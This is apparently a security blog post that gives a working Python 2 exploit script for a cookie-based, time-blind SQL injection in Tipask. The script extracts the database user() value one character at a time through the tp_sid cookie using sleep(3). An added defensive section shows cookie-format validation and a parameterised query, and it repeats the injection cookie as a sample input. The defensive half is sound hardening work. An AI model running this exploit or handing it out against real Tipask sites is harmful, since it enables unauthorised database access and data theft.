F0rg3t's Blog

A dead end is not the end of the road; I have never been alone

Tipask front-end SQL injection with no preconditions (verification script)

Vulnerability source: https://www.wooyun.org/bugs/wooyun-2010-0136776


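# Python 2 script (uses urllib2)
import urllib2
import time

# Candidate characters tried at each position of the value being read
payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
name = ""

for i in range(1, 21):
    for p in payloads:
        s1 = "%s" % (i)        # character position in the result of user()
        s2 = "%s" % (ord(p))   # character code compared at that position
        s = "https://192.168.1.100/tipask/"
        start_time = time.time()
        try:
            opener = urllib2.build_opener()
            # The tp_sid cookie value reaches the SQL query; sleep(3) runs only when the guess matches
            opener.addheaders.append(('Cookie', "tp_lastrefresh=0; tp_sid=40c3e295006a9634' UNION SELECT null,null,null,null,null,if(ORD(mid((select user()),"+s1+",1))="+s2+",sleep(3),0)#; "))
            req = urllib2.Request(s)
            req_data = opener.open(req, timeout=150)
            # A response delayed by more than 3 seconds marks a correct guess
            if time.time() - start_time > 3.0:
                name = name + p
                print name + '.....'
        except urllib2.URLError, e:
            break

print 'user is %s' % name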
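
A defensive counterpart to the script above, as an added example that is not from the original post or from Tipask: it checks the tp_sid cookie against a strict format and looks it up with a bound parameter, so the Cookie header the script sends is rejected and never becomes SQL text. The 16-hex-character format, the session table and all function names are assumptions, and SQLite stands in for the application's database.

```python
import re
import sqlite3

# Assumption: a valid tp_sid is exactly 16 lowercase hex characters, the shape
# of the value that precedes the quote in the script's Cookie header.
SID_RE = re.compile(r"[0-9a-f]{16}")

# The script's Cookie header with s1=1 and s2=97 filled in (constructed sample).
PAGE_COOKIE = ("tp_lastrefresh=0; tp_sid=40c3e295006a9634' UNION SELECT "
               "null,null,null,null,null,"
               "if(ORD(mid((select user()),1,1))=97,sleep(3),0)#; ")
GOOD_COOKIE = "tp_lastrefresh=0; tp_sid=40c3e295006a9634"


def get_cookie(header, name):
    """Return the raw value of cookie `name` from a Cookie header, or None."""
    for part in header.split(";"):
        key, sep, value = part.strip().partition("=")
        if sep and key == name:
            return value
    return None


def is_valid_sid(value):
    return value is not None and SID_RE.fullmatch(value) is not None


def make_db():
    """Hypothetical session table; the real Tipask schema is not on the page."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE session (sid TEXT PRIMARY KEY, uid INTEGER)")
    db.execute("INSERT INTO session VALUES ('40c3e295006a9634', 7)")
    return db


def lookup_bound(db, sid):
    """Bound parameter: the value is compared as data, never parsed as SQL."""
    row = db.execute("SELECT uid FROM session WHERE sid = ?", (sid,)).fetchone()
    return row[0] if row else None


def find_session(db, cookie_header):
    """Reject malformed ids before the database is touched, then look up."""
    sid = get_cookie(cookie_header, "tp_sid")
    return lookup_bound(db, sid) if is_valid_sid(sid) else None


if __name__ == "__main__":
    db = make_db()
    for header in (GOOD_COOKIE, PAGE_COOKIE):
        print(is_valid_sid(get_cookie(header, "tp_sid")), find_session(db, header))
```

Either control alone stops the request shown on this page; the format check additionally gives a cheap signal to log, since a tp_sid containing a quote or whitespace never comes from a normal browser session.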
